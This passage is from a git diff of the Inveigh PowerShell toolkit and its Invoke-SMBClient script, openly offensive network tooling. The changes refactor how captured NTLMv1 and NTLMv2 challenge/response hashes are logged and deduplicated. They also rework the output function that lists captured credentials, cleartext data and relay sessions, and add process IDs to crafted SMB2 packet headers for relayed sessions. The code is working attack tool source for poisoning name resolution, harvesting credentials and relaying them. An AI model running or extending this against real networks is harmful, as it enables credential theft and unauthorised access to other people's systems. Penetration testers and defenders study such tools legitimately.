$source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -1624,7 +1632,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -1977,6 +1985,7 @@ $HTTP_scriptblock = $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes + $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string if($HTTP_NTLM_length -eq 24) # NTLMv1 { @@ -1988,24 +1997,24 @@ $HTTP_scriptblock = { $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null } - if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") { - $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null } } @@ -2021,24 +2030,24 @@ $HTTP_scriptblock = { $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null } - if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") { - $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null } } @@ -3413,13 +3422,9 @@ $control_scriptblock = function OutputQueueLoop { - while($inveigh.output_queue.Count -gt 0) + while($inveigh.output_queue.Count -gt 0 -and !$inveigh.output_pause) { - - if($inveigh.console_output) - { - $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null - } + $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null if($inveigh.file_output) { @@ -3618,7 +3623,7 @@ $control_scriptblock = # Begin Startup Functions # HTTP Listener Startup Function -function HTTPListener() +function HTTPListener { $proxy_listener = $false $HTTPS_listener = $false @@ -3641,7 +3646,7 @@ function HTTPListener() Start-Sleep -m 50 # HTTPS Listener Startup Function -function HTTPSListener() +function HTTPSListener { $proxy_listener = $false $HTTPS_listener = $true @@ -3664,7 +3669,7 @@ function HTTPSListener() Start-Sleep -m 50 # Proxy Listener Startup Function -function ProxyListener() +function ProxyListener { $proxy_listener = $true $HTTPS_listener = $false @@ -3685,7 +3690,7 @@ function ProxyListener() } # Sniffer/Spoofer Startup Function -function SnifferSpoofer() +function SnifferSpoofer { if($inveigh.DNS) @@ -3720,7 +3725,7 @@ function SnifferSpoofer() } # Unprivileged LLMNR Spoofer Startup Function -function LLMNRSpoofer() +function LLMNRSpoofer { if($inveigh.DNS) @@ -3751,7 +3756,7 @@ function LLMNRSpoofer() } # Unprivileged mDNS Spoofer Startup Function -function mDNSSpoofer() +function mDNSSpoofer { $mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() $mDNS_spoofer_runspace.Open() @@ -3768,7 +3773,7 @@ function mDNSSpoofer() } # Unprivileged NBNS Spoofer Startup Function -function NBNSSpoofer() +function NBNSSpoofer { if($inveigh.DNS) @@ -3799,7 +3804,7 @@ function NBNSSpoofer() } # NBNS Brute Force Spoofer Startup Function -function NBNSBruteForceSpoofer() +function NBNSBruteForceSpoofer { $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace() $NBNS_bruteforce_spoofer_runspace.Open() @@ -3814,7 +3819,7 @@ function NBNSBruteForceSpoofer() } # Control Loop Startup Function -function ControlLoop() +function ControlLoop { if($inveigh.DNS) { @@ -4327,214 +4332,204 @@ Get captured POST requests. .PARAMETER POSTRequestUnique Get unique captured POST request. -#> - -[CmdletBinding()] -param -( - [parameter(Mandatory=$false)][Switch]$Cleartext, - [parameter(Mandatory=$false)][Switch]$CleartextUnique, - [parameter(Mandatory=$false)][Switch]$Console, - [parameter(Mandatory=$false)][Switch]$DNS, - [parameter(Mandatory=$false)][Switch]$DNSFailed, - [parameter(Mandatory=$false)][Switch]$Learning, - [parameter(Mandatory=$false)][Switch]$Log, - [parameter(Mandatory=$false)][Switch]$NTLMv1, - [parameter(Mandatory=$false)][Switch]$NTLMv2, - [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, - [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, - [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, - [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, - [parameter(Mandatory=$false)][Switch]$POSTRequest, - [parameter(Mandatory=$false)][Switch]$POSTRequestUnique, - [parameter(Mandatory=$false)][Switch]$Session, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter -) -if($Console -or $PSBoundParameters.Count -eq 0) -{ +.PARAMETER Session +Get relay session list. +#> - while($inveigh.console_queue.Count -gt 0) + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$DNS, + [parameter(Mandatory=$false)][Switch]$DNSFailed, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$POSTRequest, + [parameter(Mandatory=$false)][Switch]$POSTRequestUnique, + [parameter(Mandatory=$false)][Switch]$Session, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter + ) + + if($Console -or $PSBoundParameters.Count -eq 0) { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveAt(0) - } - else + while($inveigh.console_queue.Count -gt 0) { - switch -wildcard ($inveigh.console_queue[0]) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else { - {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + switch -wildcard ($inveigh.console_queue[0]) { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) + {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + } } - + } - - } - -} -if($DNS) -{ + } - foreach($DNS in $inveigh.DNS_list) + if($DNS) { - - if($DNS.StartsWith("1,")) + + foreach($DNS in $inveigh.DNS_list) { - Write-Output $DNS.Substring(2) + + if($DNS.StartsWith("1,")) + { + Write-Output $DNS.Substring(2) + } + } } -} - -if($DNSFailed) -{ - - foreach($DNS in $inveigh.DNS_list) + if($DNSFailed) { - - if($DNS.StartsWith("0,")) + + foreach($DNS in $inveigh.DNS_list) { - Write-Output $DNS.Substring(2) + + if($DNS.StartsWith("0,")) + { + Write-Output $DNS.Substring(2) + } + } } -} - -if($Log) -{ - Write-Output $inveigh.log -} - -if($NTLMv1) -{ - Write-Output $inveigh.NTLMv1_list -} + if($Log) + { + Write-Output $inveigh.log + } -if($NTLMv1Unique) -{ - $inveigh.NTLMv1_list.Sort() + if($NTLMv1) + { + Write-Output $inveigh.NTLMv1_list + } - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($NTLMv1Unique) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + $inveigh.NTLMv1_list.Sort() - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - Write-Output $unique_NTLMv1 - } + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output $unique_NTLMv1 + } -} + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } -if($NTLMv1Usernames) -{ - Write-Output $inveigh.NTLMv2_username_list -} + } -if($NTLMv2) -{ - Write-Output $inveigh.NTLMv2_list -} + if($NTLMv1Usernames) + { + Write-Output $inveigh.NTLMv2_username_list + } -if($NTLMv2Unique) -{ - $inveigh.NTLMv2_list.Sort() + if($NTLMv2) + { + Write-Output $inveigh.NTLMv2_list + } - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + if($NTLMv2Unique) { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + $inveigh.NTLMv2_list.Sort() - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - Write-Output $unique_NTLMv2 - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } -} + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } -if($NTLMv2Usernames) -{ - Write-Output $inveigh.NTLMv2_username_list -} + } -if($Cleartext) -{ - Write-Output $inveigh.cleartext_list -} + if($NTLMv2Usernames) + { + Write-Output $inveigh.NTLMv2_username_list + } -if($CleartextUnique) -{ - Write-Output $inveigh.cleartext_list | Get-Unique -} + if($Cleartext) + { + Write-Output $inveigh.cleartext_list + } -if($POSTRequest) -{ - Write-Output $inveigh.POST_request_list -} + if($CleartextUnique) + { + Write-Output $inveigh.cleartext_list | Get-Unique + } -if($POSTRequestUnique) -{ - Write-Output $inveigh.POST_request_list | Get-Unique -} + if($POSTRequest) + { + Write-Output $inveigh.POST_request_list + } -if($Learning) -{ - Write-Output $inveigh.valid_host_list -} + if($POSTRequestUnique) + { + Write-Output $inveigh.POST_request_list | Get-Unique + } -if($Session) -{ - $i = 1 - $session_list = @() + if($Learning) + { + Write-Output $inveigh.valid_host_list + } - while($i -le $inveigh.session_socket_table.Count) + if($Session) { + $i = 0 - if($inveigh.session_socket_table[$i].Connected) - { - $status = "connected" - } - else + while($i -lt $inveigh.session_socket_table.Count) { - $status = "disconnected" + + if(!$inveigh.session_socket_table[$i].Connected) + { + $inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"} + } + + $i++ } - $session_object = New-Object PSObject - Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $i - Add-Member -InputObject $session_object -MemberType NoteProperty -Name System $inveigh.session_socket_table[$i].Client.RemoteEndpoint.Address.IPaddressToString - Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $inveigh.session_user_table[$i] - Add-Member -InputObject $session_object -MemberType NoteProperty -Name Admin $inveigh.session_privilege_table[$i] - Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status - Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $inveigh.session_timestamp_table[$i] - $session_list += $session_object - $i++ + Write-Output $inveigh.session_list | Format-Table -AutoSize } - Write-Output $session_list | Format-Table -AutoSize -} - } function Watch-Inveigh diff --git a/Invoke-SMBClient.ps1 b/Invoke-SMBClient.ps1 index 1db92e5..367969d 100644 --- a/Invoke-SMBClient.ps1 +++ b/Invoke-SMBClient.ps1 @@ -156,6 +156,8 @@ function New-PacketSMBHeader { param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) + $packet_process_ID = $packet_process_ID[0,1] + $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $packet_SMBHeader.Add("Command",$packet_command) @@ -209,7 +211,7 @@ function New-PacketSMBNegotiateProtocolRequest function New-PacketSMB2Header { - param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) + param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 @@ -224,7 +226,7 @@ function New-PacketSMB2Header $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("MessageID",$packet_message_ID) - $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("ProcessID",$packet_process_ID) $packet_SMB2Header.Add("TreeID",$packet_tree_ID) $packet_SMB2Header.Add("SessionID",$packet_session_ID) $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) @@ -746,15 +748,20 @@ elseif($Source -is [String]) [String]$session_string = $session -if($session_string -and !$Inveigh -or !$inveigh.session_socket_table[$session]) -{ - Write-Output "[-] Inveigh Relay session not found" - $startup_error = $true -} -elseif($session_string -and !$inveigh.session_socket_table[$session].Connected) +if($session_string) { - Write-Output "[-] Inveigh Relay session not connected" - $startup_error = $true + + if(!$Inveigh -or !$inveigh.session_socket_table[$session]) + { + Write-Output "[-] Inveigh Relay session not found" + $startup_error = $true + } + elseif(!$inveigh.session_socket_table[$session].Connected) + { + Write-Output "[-] Inveigh Relay session not connected" + $startup_error = $true + } + } $destination = $Destination.Replace('.\','') @@ -775,8 +782,7 @@ else $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) -#[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} -[Byte[]]$process_ID_bytes = 0x00,0x00,0x00,0x00 +[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} if(!$session_string_string) { @@ -997,7 +1003,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'NegotiateSMB' { - $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes[0,1] 0x00,0x00 + $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00 $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1042,8 +1048,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_message_ID = 1 - $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -1058,9 +1063,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'NTLMSSPNegotiate' { - $SMB2_message_ID ++ - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1173,9 +1177,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + $NTLMv2_response - $SMB2_message_ID ++ - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth @@ -1240,8 +1243,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeConnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1354,8 +1356,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_ioctl_path = "\" + $Target + "\" + $Share $SMB_ioctl_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_ioctl_path) + 0x00,0x00 $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1388,8 +1389,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1686,8 +1686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'QueryInfoRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["NextCommand"] = $header_next_command if($SMB_signing) @@ -1709,8 +1708,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2b_header["ProcessID"] = $process_ID_bytes + $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1859,8 +1857,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'SetInfoRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1920,8 +1917,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateRequestFindRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1947,8 +1943,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2b_header["ProcessID"] = $process_ID_bytes + $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2b_header["NextCommand"] = 0x68,0x00,0x00,0x00 if($SMB_signing) @@ -1974,8 +1969,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2c_header["ProcessID"] = $process_ID_bytes + $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2229,8 +2223,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table { $SMB_file_ID = $SMB_client_receive[132..147] $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["NextCommand"] = 0x68,0x00,0x00,0x00 if($SMB_signing) @@ -2252,8 +2245,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2b_header["ProcessID"] = $process_ID_bytes + $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2322,8 +2314,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_file_ID = $SMB_client_receive[132..147] } - $SMB2_message_ID ++ - $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2443,7 +2435,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'ReadRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["CreditCharge"] = 0x01,0x00 if($SMB_signing) @@ -2576,7 +2568,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID 